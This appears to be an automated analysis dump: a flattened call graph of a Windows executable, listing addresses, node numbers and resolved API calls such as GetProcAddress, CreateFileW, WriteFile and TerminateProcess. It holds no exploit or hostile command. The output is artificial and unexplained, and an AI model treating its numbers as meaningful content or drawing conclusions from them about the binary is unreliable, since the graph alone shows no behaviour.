7ff62cc72910 9 API calls 9365->9366 9366->9363 9368 7ff62cc850a1 _get_daylight 9367->9368 9370 7ff62cc850ce _get_daylight 9367->9370 9369 7ff62cc850ab _invalid_parameter_noinfo 9368->9369 9373 7ff62cc85058 9368->9373 9369->9320 9371 7ff62cc8510d 9370->9371 9372 7ff62cc850f6 _invalid_parameter_noinfo 9370->9372 9371->9320 9372->9371 9373->9320 9375 7ff62cc745b0 40 API calls 9374->9375 9376 7ff62cc7108c 9375->9376 9377 7ff62cc710a9 9376->9377 9378 7ff62cc71094 9376->9378 9380 7ff62cc80744 7 API calls 9377->9380 9379 7ff62cc72710 9 API calls 9378->9379 9384 7ff62cc710a4 __std_exception_destroy 9379->9384 9381 7ff62cc710bf 9380->9381 9382 7ff62cc710e6 9381->9382 9383 7ff62cc710c3 _get_daylight 9381->9383 9386 7ff62cc710f7 _get_daylight 9382->9386 9387 7ff62cc71122 9382->9387 9385 7ff62cc72910 9 API calls 9383->9385 9384->9335 9392 7ff62cc710e1 __std_exception_destroy 9385->9392 9390 7ff62cc72910 9 API calls 9386->9390 9388 7ff62cc71129 9387->9388 9395 7ff62cc7113c 9387->9395 9389 7ff62cc71210 33 API calls 9388->9389 9389->9392 9390->9392 9391 7ff62cc800bc 11 API calls 9393 7ff62cc711b4 9391->9393 9392->9391 9393->9384 9399 7ff62cc746e0 9393->9399 9394 7ff62cc8040c _fread_nolock 23 API calls 9394->9395 9395->9392 9395->9394 9397 7ff62cc711ed _get_daylight 9395->9397 9398 7ff62cc72910 9 API calls 9397->9398 9398->9392 9400 7ff62cc746f0 9399->9400 9401 7ff62cc7478e 9400->9401 9404 7ff62cc7473b CreateSymbolicLinkW 9400->9404 9402 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9401->9402 9403 7ff62cc747a9 9402->9403 9403->9384 9404->9401 9405 7ff62cc74765 9404->9405 9405->9401 9406 7ff62cc7476e GetLastError 9405->9406 9406->9401 9407 7ff62cc74779 9406->9407 9408 7ff62cc746e0 6 API calls 9407->9408 9408->9401 9409->8767 9410->8769 9411->8774 9813 7ff62cc87f2c 9814 7ff62cc87f46 9813->9814 9817 7ff62cc87f6c 9814->9817 9816 7ff62cc87f52 9818 7ff62cc87f8c 9817->9818 9819 7ff62cc87f95 9818->9819 9820 7ff62cc87fb1 9818->9820 9821 7ff62cc87f9f _get_daylight 9818->9821 9819->9816 9826 7ff62cc88000 9820->9826 9823 7ff62cc87fa4 _invalid_parameter_noinfo 9821->9823 9823->9819 9824 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9824->9819 9825 7ff62cc87fb6 9825->9824 9828 7ff62cc880b4 __crtLCMapStringW 9826->9828 9829 7ff62cc8802f __crtLCMapStringW 9826->9829 9827 7ff62cc880f3 9833 7ff62cc8ec08 _fread_nolock HeapAlloc 9827->9833 9828->9827 9830 7ff62cc88050 _get_daylight 9828->9830 9829->9830 9832 7ff62cc8806c 9829->9832 9831 7ff62cc88055 _invalid_parameter_noinfo 9830->9831 9834 7ff62cc88132 9831->9834 9835 7ff62cc8ec08 _fread_nolock HeapAlloc 9832->9835 9836 7ff62cc8807e 9833->9836 9834->9825 9835->9836 9837 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9836->9837 9837->9834 9838 7ff62cc89730 9839 7ff62cc89749 9838->9839 9840 7ff62cc89740 9838->9840 9840->9839 9844 7ff62cc89208 9840->9844 9845 7ff62cc8921d 9844->9845 9846 7ff62cc89221 9844->9846 9845->9839 9853 7ff62cc8955c 9845->9853 9847 7ff62cc89233 9846->9847 9849 7ff62cc8923f 9846->9849 9848 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9847->9848 9848->9845 9850 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9849->9850 9851 7ff62cc89266 9850->9851 9852 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9851->9852 9852->9845 9854 7ff62cc89585 9853->9854 9859 7ff62cc8959e 9853->9859 9854->9839 9855 7ff62cc90858 WideCharToMultiByte 9855->9859 9856 7ff62cc8ec08 _fread_nolock HeapAlloc 9856->9859 9857 7ff62cc8962e 9858 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9857->9858 9858->9854 9859->9854 9859->9855 9859->9856 9859->9857 9860 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9859->9860 9860->9859 9861 7ff62cc7f72a 9863 7ff62cc7f737 9861->9863 9862 7ff62cc7f77b RaiseException 9864 7ff62cc7f7a2 9862->9864 9863->9862 10233 7ff62cc7dfb4 10234 7ff62cc7dd38 __vcrt_FlsAlloc 5 API calls 10233->10234 10235 7ff62cc7dfea 10234->10235 10236 7ff62cc7dff4 10235->10236 10237 7ff62cc7dfff InitializeCriticalSectionAndSpinCount 10235->10237 10237->10236 10238 7ff62cc92da8 10239 7ff62cc92ea0 10238->10239 10240 7ff62cc92db1 10238->10240 10274 7ff62cc92d74 10240->10274 10243 7ff62cc92d74 2 API calls 10244 7ff62cc92dda 10243->10244 10245 7ff62cc92d74 2 API calls 10244->10245 10246 7ff62cc92de8 10245->10246 10247 7ff62cc92d74 2 API calls 10246->10247 10248 7ff62cc92df6 10247->10248 10249 7ff62cc92d74 2 API calls 10248->10249 10250 7ff62cc92e05 10249->10250 10251 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10250->10251 10252 7ff62cc92e11 10251->10252 10253 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10252->10253 10254 7ff62cc92e1d 10253->10254 10255 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10254->10255 10256 7ff62cc92e29 10255->10256 10257 7ff62cc92d74 2 API calls 10256->10257 10258 7ff62cc92e37 10257->10258 10259 7ff62cc92d74 2 API calls 10258->10259 10260 7ff62cc92e45 10259->10260 10261 7ff62cc92d74 2 API calls 10260->10261 10262 7ff62cc92e53 10261->10262 10263 7ff62cc92d74 2 API calls 10262->10263 10264 7ff62cc92e61 10263->10264 10265 7ff62cc92d74 2 API calls 10264->10265 10266 7ff62cc92e70 10265->10266 10267 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10266->10267 10268 7ff62cc92e7c 10267->10268 10269 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10268->10269 10270 7ff62cc92e88 10269->10270 10271 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10270->10271 10272 7ff62cc92e94 10271->10272 10273 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10272->10273 10273->10239 10275 7ff62cc92d8a 10274->10275 10276 7ff62cc92d9b 10274->10276 10275->10276 10277 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10275->10277 10276->10243 10277->10275 10278 7ff62cc9aea8 10279 7ff62cc9aeb7 10278->10279 10280 7ff62cc9af18 10278->10280 10282 7ff62cc88568 LeaveCriticalSection 10279->10282 10283 7ff62cc776b0 GetProcAddress 10284 7ff62cc7770b GetProcAddress 10283->10284 10285 7ff62cc776d9 GetLastError 10283->10285 10286 7ff62cc77736 GetProcAddress 10284->10286 10287 7ff62cc77727 GetLastError 10284->10287 10290 7ff62cc776e6 10285->10290 10288 7ff62cc77752 GetLastError 10286->10288 10289 7ff62cc77761 GetProcAddress 10286->10289 10287->10290 10288->10290 10291 7ff62cc7777d GetLastError 10289->10291 10292 7ff62cc7778f GetProcAddress 10289->10292 10291->10290 10293 7ff62cc777bd GetProcAddress 10292->10293 10294 7ff62cc777ab GetLastError 10292->10294 10295 7ff62cc777eb GetProcAddress 10293->10295 10296 7ff62cc777d9 GetLastError 10293->10296 10294->10290 10297 7ff62cc77819 GetProcAddress 10295->10297 10298 7ff62cc77807 GetLastError 10295->10298 10296->10290 10299 7ff62cc77847 GetProcAddress 10297->10299 10300 7ff62cc77835 GetLastError 10297->10300 10298->10297 10301 7ff62cc77875 GetProcAddress 10299->10301 10302 7ff62cc77863 GetLastError 10299->10302 10300->10299 10303 7ff62cc778a3 GetProcAddress 10301->10303 10304 7ff62cc77891 GetLastError 10301->10304 10302->10301 10305 7ff62cc778d1 GetProcAddress 10303->10305 10306 7ff62cc778bf GetLastError 10303->10306 10304->10303 10307 7ff62cc778ed GetLastError 10305->10307 10308 7ff62cc778ff GetProcAddress 10305->10308 10306->10305 10307->10308 10309 7ff62cc7792d GetProcAddress 10308->10309 10310 7ff62cc7791b GetLastError 10308->10310 10311 7ff62cc7795b GetProcAddress 10309->10311 10312 7ff62cc77949 GetLastError 10309->10312 10310->10309 10313 7ff62cc77989 GetProcAddress 10311->10313 10314 7ff62cc77977 GetLastError 10311->10314 10312->10311 10315 7ff62cc779b7 GetProcAddress 10313->10315 10316 7ff62cc779a5 GetLastError 10313->10316 10314->10313 10317 7ff62cc779e5 GetProcAddress 10315->10317 10318 7ff62cc779d3 GetLastError 10315->10318 10316->10315 10319 7ff62cc77a13 GetProcAddress 10317->10319 10320 7ff62cc77a01 GetLastError 10317->10320 10318->10317 10321 7ff62cc77a41 GetProcAddress 10319->10321 10322 7ff62cc77a2f GetLastError 10319->10322 10320->10319 10323 7ff62cc77a5d GetLastError 10321->10323 10324 7ff62cc77a6f GetProcAddress 10321->10324 10322->10321 10323->10324 10325 7ff62cc77a9d GetProcAddress 10324->10325 10326 7ff62cc77a8b GetLastError 10324->10326 10327 7ff62cc77acb GetProcAddress 10325->10327 10328 7ff62cc77ab9 GetLastError 10325->10328 10326->10325 10329 7ff62cc77af9 GetProcAddress 10327->10329 10330 7ff62cc77ae7 GetLastError 10327->10330 10328->10327 10331 7ff62cc77b27 GetProcAddress 10329->10331 10332 7ff62cc77b15 GetLastError 10329->10332 10330->10329 10333 7ff62cc77b55 GetProcAddress 10331->10333 10334 7ff62cc77b43 GetLastError 10331->10334 10332->10331 10335 7ff62cc77b83 GetProcAddress 10333->10335 10336 7ff62cc77b71 GetLastError 10333->10336 10334->10333 10337 7ff62cc77bb1 GetProcAddress 10335->10337 10338 7ff62cc77b9f GetLastError 10335->10338 10336->10335 10339 7ff62cc77bcd GetLastError 10337->10339 10340 7ff62cc77bdf GetProcAddress 10337->10340 10338->10337 10339->10340 10341 7ff62cc77c0d GetProcAddress 10340->10341 10342 7ff62cc77bfb GetLastError 10340->10342 10343 7ff62cc77c3b GetProcAddress 10341->10343 10344 7ff62cc77c29 GetLastError 10341->10344 10342->10341 10345 7ff62cc77c69 GetProcAddress 10343->10345 10346 7ff62cc77c57 GetLastError 10343->10346 10344->10343 10347 7ff62cc77c97 GetProcAddress 10345->10347 10348 7ff62cc77c85 GetLastError 10345->10348 10346->10345 10349 7ff62cc77cc5 10347->10349 10350 7ff62cc77cb3 GetLastError 10347->10350 10348->10347 10350->10349 10351 7ff62cc780b0 10352 7ff62cc7819b SetWindowLongPtrW 10351->10352 10353 7ff62cc780cb 10351->10353 10354 7ff62cc78192 10352->10354 10355 7ff62cc7816a GetWindowLongPtrW ShutdownBlockReasonCreate 10353->10355 10356 7ff62cc780d4 10353->10356 10355->10354 10357 7ff62cc7818c GetLastError 10355->10357 10358 7ff62cc780ea GetWindowLongPtrW 10356->10358 10359 7ff62cc780d9 DefWindowProcW 10356->10359 10357->10354 10360 7ff62cc780fd 10358->10360 10361 7ff62cc78111 WaitForSingleObject 10358->10361 10359->10358 10362 7ff62cc78127 TerminateProcess 10361->10362 10363 7ff62cc78155 10361->10363 10364 7ff62cc7813d GetLastError 10362->10364 10365 7ff62cc78143 WaitForSingleObject 10362->10365 10368 7ff62cc74070 10363->10368 10364->10365 10365->10363 10367 7ff62cc7815d 10369 7ff62cc76fb0 FreeLibrary 10368->10369 10370 7ff62cc74090 10369->10370 10371 7ff62cc740d4 10370->10371 10375 7ff62cc79200 10370->10375 10371->10367 10374 7ff62cc72710 9 API calls 10374->10371 10380 7ff62cc78560 10375->10380 10377 7ff62cc79216 10378 7ff62cc79230 Sleep 10377->10378 10379 7ff62cc740b4 10377->10379 10378->10377 10379->10371 10379->10374 10381 7ff62cc7c8c0 10380->10381 10382 7ff62cc78572 GetCurrentProcess 10381->10382 10383 7ff62cc785ad 10382->10383 10386 7ff62cc785d9 K32EnumProcessModules 10383->10386 10387 7ff62cc78721 __std_exception_destroy 10383->10387 10384 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10385 7ff62cc78750 10384->10385 10385->10377 10386->10387 10390 7ff62cc785f6 10386->10390 10387->10384 10388 7ff62cc78663 K32GetModuleFileNameExW 10388->10390 10389 7ff62cc786d0 K32GetModuleFileNameExW 10391 7ff62cc786ed FreeLibrary 10389->10391 10392 7ff62cc786af 10389->10392 10390->10387 10390->10388 10390->10392 10391->10392 10392->10387 10392->10389 10393 7ff62cc78705 FreeLibrary 10392->10393 10393->10392 9865 7ff62cc7f630 9866 7ff62cc7f665 9865->9866 9867 7ff62cc7f673 __except_validate_context_record 9866->9867 9868 7ff62cc7f6b7 9867->9868 9869 7ff62cc7f6c9 _CreateFrameInfo 9868->9869 9870 7ff62cc7f6e9 9869->9870 10394 7ff62cc8089c 10395 7ff62cc808bc 10394->10395 10396 7ff62cc808e9 10394->10396 10395->10396 10397 7ff62cc808c6 10395->10397 10398 7ff62cc808f1 10395->10398 10399 7ff62cc8a884 4 API calls 10397->10399 10401 7ff62cc807dc 10398->10401 10399->10396 10402 7ff62cc807f9 10401->10402 10405 7ff62cc8081c 10402->10405 10404 7ff62cc80802 10404->10396 10408 7ff62cc8d564 10405->10408 10407 7ff62cc80845 10407->10404 10410 7ff62cc8d576 10408->10410 10409 7ff62cc8d5df 10409->10407 10410->10409 10411 7ff62cc8d66c _fread_nolock HeapAlloc 10410->10411 10412 7ff62cc8d5d5 10411->10412 10413 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10412->10413 10413->10409 9871 7ff62cc91720 9873 7ff62cc91729 9871->9873 9872 7ff62cc917ae 9873->9872 9875 7ff62cc80024 9873->9875 9876 7ff62cc80054 9875->9876 9877 7ff62cc7ff14 11 API calls 9876->9877 9878 7ff62cc8006d 9877->9878 9878->9873 9412 7ff62cc85698 9413 7ff62cc856cf 9412->9413 9416 7ff62cc856b2 _fread_nolock _get_daylight 9412->9416 9414 7ff62cc856e2 CreateFileW 9413->9414 9413->9416 9415 7ff62cc85716 9414->9415 9421 7ff62cc8574c 9414->9421 9425 7ff62cc857ec GetFileType 9415->9425 9418 7ff62cc856bf _invalid_parameter_noinfo 9416->9418 9420 7ff62cc85755 _fread_nolock 9418->9420 9421->9420 9438 7ff62cc85a34 9421->9438 9422 7ff62cc8572b CloseHandle 9422->9420 9423 7ff62cc85741 CloseHandle 9423->9420 9426 7ff62cc8583a 9425->9426 9427 7ff62cc858f7 9425->9427 9428 7ff62cc85866 GetFileInformationByHandle 9426->9428 9437 7ff62cc8589a _fread_nolock _get_daylight 9426->9437 9429 7ff62cc85921 9427->9429 9430 7ff62cc858ff 9427->9430 9431 7ff62cc85912 GetLastError 9428->9431 9432 7ff62cc8588f 9428->9432 9433 7ff62cc85944 PeekNamedPipe 9429->9433 9429->9437 9430->9431 9430->9437 9431->9437 9434 7ff62cc85a34 2 API calls 9432->9434 9433->9437 9434->9437 9435 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9436 7ff62cc85724 9435->9436 9436->9422 9436->9423 9437->9435 9440 7ff62cc85a5c 9438->9440 9439 7ff62cc85b29 9439->9420 9440->9439 9448 7ff62cc8f794 9440->9448 9442 7ff62cc85af0 9442->9439 9443 7ff62cc8f794 2 API calls 9442->9443 9444 7ff62cc85b03 9443->9444 9444->9439 9445 7ff62cc8f794 2 API calls 9444->9445 9446 7ff62cc85b16 9445->9446 9446->9439 9447 7ff62cc8f794 2 API calls 9446->9447 9447->9439 9449 7ff62cc8f7a1 9448->9449 9451 7ff62cc8f7c5 _get_daylight 9448->9451 9450 7ff62cc8f7a6 _get_daylight 9449->9450 9449->9451 9452 7ff62cc8f7ab _invalid_parameter_noinfo 9450->9452 9453 7ff62cc8f804 _invalid_parameter_noinfo 9451->9453 9454 7ff62cc8f81e 9451->9454 9452->9442 9453->9454 9454->9442 9879 7ff62cc7df18 9883 7ff62cc7dd38 9879->9883 9884 7ff62cc7de22 TlsGetValue 9883->9884 9889 7ff62cc7dd7c 9883->9889 9885 7ff62cc7ddaa LoadLibraryExW 9887 7ff62cc7ddcb GetLastError 9885->9887 9888 7ff62cc7de49 9885->9888 9886 7ff62cc7de69 GetProcAddress 9886->9884 9887->9889 9888->9886 9890 7ff62cc7de60 FreeLibrary 9888->9890 9889->9884 9889->9885 9889->9886 9891 7ff62cc7dded LoadLibraryExW 9889->9891 9890->9886 9891->9888 9891->9889 10414 7ff62cc925a4 10418 7ff62cc925c7 10414->10418 10415 7ff62cc925d1 10416 7ff62cc92643 10415->10416 10417 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 10415->10417 10420 7ff62cc9265b 10417->10420 10418->10415 10419 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10418->10419 10419->10415 9892 7ff62cc8ce18 9893 7ff62cc8ce48 9892->9893 9896 7ff62cc8ceb0 9893->9896 9895 7ff62cc8ce61 9897 7ff62cc8cf06 9896->9897 9904 7ff62cc8ced9 9896->9904 9898 7ff62cc8cf1f 9897->9898 9901 7ff62cc8cf76 9897->9901 9899 7ff62cc8a884 4 API calls 9898->9899 9899->9904 9900 7ff62cc8cf94 9920 7ff62cc88568 LeaveCriticalSection 9900->9920 9901->9900 9905 7ff62cc8cfd0 9901->9905 9904->9895 9906 7ff62cc8cffb 9905->9906 9916 7ff62cc8d02f _fread_nolock 9905->9916 9907 7ff62cc8d000 9906->9907 9912 7ff62cc8d06e 9906->9912 9908 7ff62cc8a884 4 API calls 9907->9908 9908->9916 9909 7ff62cc8d1ac 9910 7ff62cc8d210 WriteFile 9909->9910 9909->9916 9911 7ff62cc8d237 GetLastError 9910->9911 9910->9916 9911->9916 9912->9909 9913 7ff62cc8d0df GetConsoleMode 9912->9913 9913->9909 9914 7ff62cc8d0fa 9913->9914 9915 7ff62cc8d189 9914->9915 9919 7ff62cc8d106 9914->9919 9921 7ff62cc8c610 GetConsoleOutputCP 9915->9921 9916->9900 9918 7ff62cc8d177 GetLastError 9918->9916 9919->9916 9919->9918 9926 7ff62cc8c6a4 _fread_nolock 9921->9926 9922 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9923 7ff62cc8ca6a 9922->9923 9923->9916 9924 7ff62cc8c9d8 9924->9922 9925 7ff62cc90858 WideCharToMultiByte 9925->9926 9926->9924 9926->9925 9927 7ff62cc8c940 WriteFile 9926->9927 9929 7ff62cc8c980 WriteFile 9926->9929 9927->9926 9928 7ff62cc8ca53 GetLastError 9927->9928 9928->9924 9929->9926 9929->9928 10421 7ff62cc89e98 10422 7ff62cc89eb4 10421->10422 10425 7ff62cc89f10 10422->10425 10424 7ff62cc89ebd 10427 7ff62cc89f3c 10425->10427 10430 7ff62cc89fd1 10425->10430 10426 7ff62cc89fad 10429 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10426->10429 10426->10430 10427->10426 10428 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10427->10428 10427->10430 10428->10426 10429->10430 10430->10424 10431 7ff62cc95698 10432 7ff62cc95608 _get_daylight _invalid_parameter_noinfo 10431->10432 10433 7ff62cc956c5 10432->10433 9930 7ff62cc7ce20 9933 7ff62cc7d080 9930->9933 9934 7ff62cc7ce29 9933->9934 9935 7ff62cc7d0a3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9933->9935 9935->9934 10434 7ff62cc7ef48 10435 7ff62cc7ef81 10434->10435 10443 7ff62cc7f03a 10434->10443 10436 7ff62cc7efa5 EncodePointer 10435->10436 10437 7ff62cc7efb5 _CallSETranslator 10435->10437 10436->10437 10438 7ff62cc7f018 10437->10438 10439 7ff62cc7f1af 10437->10439 10437->10443 10444 7ff62cc7e230 10438->10444 10440 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 10439->10440 10442 7ff62cc7f1b4 10440->10442 10445 7ff62cc7e674 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 10444->10445 10446 7ff62cc7e26e 10445->10446 10447 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 10446->10447 10449 7ff62cc7e27c 10446->10449 10448 7ff62cc7e360 10447->10448 10449->10443 9941 7ff62cc89ed4 9942 7ff62cc89ef0 9941->9942 9945 7ff62cc8a0c0 9942->9945 9944 7ff62cc89ef9 9946 7ff62cc8a0e6 9945->9946 9947 7ff62cc8a0ee 9945->9947 9946->9944 9947->9946 9948 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9947->9948 9948->9946 9949 7ff62cc7ded0 9950 7ff62cc7dd38 __vcrt_FlsAlloc 5 API calls 9949->9950 9952 7ff62cc7def7 TlsFree 9950->9952 9953 7ff62cc7d8d0 __vcrt_initialize_locks 9954 7ff62cc7d8dd 9953->9954 9955 7ff62cc7d8e1 9953->9955 9955->9954 9956 7ff62cc7d8ea __vcrt_uninitialize_locks 9955->9956 9956->9954 9957 7ff62cc7e0d0 9958 7ff62cc7e674 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 9957->9958 9959 7ff62cc7e0e4 __FrameHandler3::FrameUnwindToEmptyState 9958->9959 9960 7ff62cc930cc 9961 7ff62cc93168 9960->9961 9962 7ff62cc930ef 9960->9962 9963 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9961->9963 9976 7ff62cc931bb 9961->9976 9962->9961 9964 7ff62cc9312e 9962->9964 9968 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9962->9968 9965 7ff62cc9318c 9963->9965 9967 7ff62cc93150 9964->9967 9974 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9964->9974 9966 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9965->9966 9969 7ff62cc931a0 9966->9969 9970 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9967->9970 9971 7ff62cc93122 __free_lconv_mon 9968->9971 9972 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9969->9972 9975 7ff62cc9315c 9970->9975 9971->9964 9977 7ff62cc931af 9972->9977 9973 7ff62cc93226 9978 7ff62cc93144 __free_lconv_num 9974->9978 9979 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9975->9979 9976->9973 9980 7ff62cc8a9b8 RtlFreeHeap GetLastError Concurrency::details::SchedulerProxy::DeleteThis 9976->9980 9981 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9977->9981 9978->9967 9979->9961 9980->9976 9981->9976 9982 7ff62cc97dc0 9983 7ff62cc97dd1 CloseHandle 9982->9983 9984 7ff62cc97dd7 9982->9984 9983->9984 9985 7ff62cc978c0 9986 7ff62cc97901 9985->9986 9987 7ff62cc8f910 _fread_nolock MultiByteToWideChar 9986->9987 9991 7ff62cc9794b 9987->9991 9988 7ff62cc97bc9 9989 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 9988->9989 9990 7ff62cc97bd7 9989->9990 9991->9988 9992 7ff62cc8d66c _fread_nolock HeapAlloc 9991->9992 9993 7ff62cc97983 9991->9993 9997 7ff62cc97a41 9991->9997 9992->9993 9995 7ff62cc8f910 _fread_nolock MultiByteToWideChar 9993->9995 9993->9997 9994 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9994->9988 9996 7ff62cc979f6 9995->9996 9996->9997 9998 7ff62cc8d66c _fread_nolock HeapAlloc 9996->9998 9999 7ff62cc97b64 9996->9999 10001 7ff62cc97ab0 9996->10001 9997->9988 9997->9994 9998->10001 9999->9997 10000 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 9999->10000 10000->9997 10001->9997 10001->9999 10002 7ff62cc97b50 10001->10002 10003 7ff62cc97b66 10001->10003 10004 7ff62cc90858 WideCharToMultiByte 10002->10004 10005 7ff62cc90858 WideCharToMultiByte 10003->10005 10006 7ff62cc97b5e 10004->10006 10005->10006 10006->9999 10007 7ff62cc97b7e 10006->10007 10007->9997 10008 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10007->10008 10008->9997 10450 7ff62cc8b040 10451 7ff62cc8b05a 10450->10451 10452 7ff62cc8b045 10450->10452 10456 7ff62cc8b060 10452->10456 10454 7ff62cc8b052 10455 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10454->10455 10455->10451 10457 7ff62cc8b0aa 10456->10457 10458 7ff62cc8b0a2 10456->10458 10460 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10457->10460 10459 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10458->10459 10459->10457 10461 7ff62cc8b0b7 10460->10461 10462 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10461->10462 10463 7ff62cc8b0c4 10462->10463 10464 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10463->10464 10465 7ff62cc8b0d1 10464->10465 10466 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10465->10466 10467 7ff62cc8b0de 10466->10467 10468 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10467->10468 10469 7ff62cc8b0eb 10468->10469 10470 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10469->10470 10471 7ff62cc8b0f8 10470->10471 10472 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10471->10472 10473 7ff62cc8b105 10472->10473 10474 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10473->10474 10475 7ff62cc8b115 10474->10475 10476 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10475->10476 10477 7ff62cc8b125 10476->10477 10480 7ff62cc8af04 10477->10480 10479 7ff62cc8b13a Concurrency::details::SchedulerProxy::DeleteThis 10479->10454 10482 7ff62cc8af20 10480->10482 10481 7ff62cc8af50 10481->10479 10482->10481 10483 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10482->10483 10483->10481 10009 7ff62cc7fdb8 10010 7ff62cc7fdd7 10009->10010 10011 7ff62cc7fe22 RaiseException 10010->10011 10012 7ff62cc7fe00 RtlPcToFileHeader 10010->10012 10013 7ff62cc7fe18 10012->10013 10013->10011 10014 7ff62cc7d6b8 __except_validate_context_record 10015 7ff62cc7d7e9 10014->10015 10016 7ff62cc7d704 10014->10016 10016->10015 10017 7ff62cc7d773 _IsNonwritableInCurrentImage 10016->10017 10018 7ff62cc7d7ac RtlUnwindEx 10016->10018 10017->10016 10018->10016 10484 7ff62cc7f538 __std_exception_copy 10019 7ff62cc747c0 10020 7ff62cc747cc 10019->10020 10021 7ff62cc7c5c0 __FrameHandler3::FrameUnwindToEmptyState 6 API calls 10020->10021 10022 7ff62cc7481d 10021->10022 10023 7ff62cc720c0 10024 7ff62cc7213b GetWindowLongPtrW 10023->10024 10025 7ff62cc720d5 10023->10025 10026 7ff62cc72180 10024->10026 10028 7ff62cc7210a SetWindowLongPtrW 10025->10028 10030 7ff62cc720e2 10025->10030 10027 7ff62cc72158 InvalidateRect 10026->10027 10031 7ff62cc720fa 10027->10031 10032 7ff62cc72124 10028->10032 10029 7ff62cc720f4 EndDialog 10029->10031 10030->10029 10030->10031 10496 7ff62cc8ef3c 10497 7ff62cc8ed80 5 API calls 10496->10497 10498 7ff62cc8ef64 10497->10498 10033 7ff62cc89df0 10034 7ff62cc89dfd _get_daylight 10033->10034 10035 7ff62cc89e36 10034->10035 10036 7ff62cc89e26 _invalid_parameter_noinfo 10034->10036 10036->10035 10499 7ff62cc99770 10502 7ff62cc99798 10499->10502 10503 7ff62cc997d7 10502->10503 10504 7ff62cc999e7 _clrfp RaiseException 10503->10504 10505 7ff62cc99792 10504->10505 10037 7ff62cc90ff4 10038 7ff62cc91011 10037->10038 10039 7ff62cc91029 10037->10039 10040 7ff62cc8ec08 _fread_nolock HeapAlloc 10039->10040 10047 7ff62cc9104d 10040->10047 10041 7ff62cc910bd 10043 7ff62cc8a574 __FrameHandler3::FrameUnwindToEmptyState 14 API calls 10041->10043 10042 7ff62cc910ae 10044 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10042->10044 10045 7ff62cc910d8 10043->10045 10044->10038 10046 7ff62cc8ec08 _fread_nolock HeapAlloc 10046->10047 10047->10041 10047->10042 10047->10046 10048 7ff62cc8a9b8 Concurrency::details::SchedulerProxy::DeleteThis 2 API calls 10047->10048 10048->10047 10506 7ff62cc8976c 10507 7ff62cc89785 10506->10507 10508 7ff62cc8977c 10506->10508 10508->10507 10510 7ff62cc8963c 10508->10510 10511 7ff62cc8965f 10510->10511 10516 7ff62cc89676 10510->10516 10511->10507 10512 7ff62cc8f910 